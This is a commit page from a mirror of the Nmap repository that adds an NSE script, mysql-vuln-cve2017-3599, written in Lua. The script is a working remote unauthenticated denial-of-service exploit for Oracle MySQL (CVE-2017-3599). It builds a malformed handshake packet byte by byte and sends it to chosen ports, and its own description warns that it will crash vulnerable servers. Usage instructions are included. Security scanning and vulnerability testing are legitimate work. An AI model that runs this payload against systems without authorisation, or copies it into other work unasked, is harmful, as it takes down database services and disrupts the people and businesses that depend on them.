mirror of
https://github.com/nmap/nmap.git
synced 2026-06-30 05:05:53 +00:00
Add mysql-vuln-cve2017-3599.nse.
This commit is contained in:
Loganaden Velvindron
parent
7bd54ab098
commit
e19b2ab80b
1 changed files with 70 additions and 0 deletions
70
scripts/mysql-vuln-cve2017-3599.nse
Normal file
70
scripts/mysql-vuln-cve2017-3599.nse
Normal file
|
|
@ -0,0 +1,70 @@
|
|||
description=[[
|
||||
CVE-2017-3599 - remote unauthenticated Denial of Service against Oracle MySQL.
|
||||
Warning: This WILL cause DoS on vulnerable mysql machines.
|
||||
Thanks: SECWORKS, hackers.mu team.
|
||||
]]
|
||||
|
||||
---
|
||||
--@usage nmap -sU -p <portnum> --script mysql-vuln-cve2017-3599 --script-args mysql-vuln-cve2017-3599.ports=<ports> <target>
|
||||
--@output
|
||||
--PORT STATE SERVICE
|
||||
--3306/tcp open mysql
|
||||
--|_mysql-vuln-cve2017-3599: true
|
||||
|
||||
author = "Loganaden Velvindron (logan@hackers.mu)"
|
||||
license = "Same as Nmap--See http://nmap.org/book/man-legal.html";
|
||||
categories = {"dos", "vuln", "exploit", "intrusive"}
|
||||
|
||||
local string = require "string"
|
||||
local shortport = require "shortport"
|
||||
local bin = require "bin"
|
||||
local comm = require "comm"
|
||||
local stdnse = require "stdnse"
|
||||
|
||||
portrule = function(host, port)
|
||||
if not stdnse.get_script_args(SCRIPT_NAME .. ".ports") then
|
||||
stdnse.print_debug(3,"Skipping '%s' %s, 'ports' argument is missing.",SCRIPT_NAME, SCRIPT_TYPE)
|
||||
return false
|
||||
end
|
||||
|
||||
local ports = stdnse.get_script_args(SCRIPT_NAME .. ".ports")
|
||||
|
||||
--print out a debug message if port 3306/tcp is open
|
||||
if port.number==3306 and port.protocol == "tcp" and not(ports) then
|
||||
stdnse.print_debug("Port 3306/tcp is open. mysql over tcp")
|
||||
return false
|
||||
end
|
||||
|
||||
return port.protocol == "tcp" and stdnse.in_port_range(port, ports:gsub(",",",") ) and
|
||||
not(shortport.port_is_excluded(port.number,port.protocol))
|
||||
end
|
||||
|
||||
|
||||
local packet1 =
|
||||
string.char(0x01)
|
||||
..string.char(0x85, 0xa2, 0xbf, 0x01)
|
||||
..string.char(0x00, 0x00, 0x00, 0x01)
|
||||
..string.char(0x21)
|
||||
--..string.char(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)
|
||||
..string.rep(string.char(0x00),23)
|
||||
.."test"
|
||||
..string.char(0x00)
|
||||
..string.char(0xff)
|
||||
|
||||
local packet1_len = bin.pack("i", string.len(packet1)-1)
|
||||
packet1_len = string.sub(packet1_len,1,3)
|
||||
|
||||
local payload = packet1_len..packet1
|
||||
|
||||
|
||||
action = function(host, port)
|
||||
local status, result = comm.exchange(host, port, payload, {proto="tcp", recv_before=true, timeout=8000})
|
||||
|
||||
|
||||
if not status then
|
||||
return false
|
||||
else
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
Loading…
Add table
Add a link
Reference in a new issue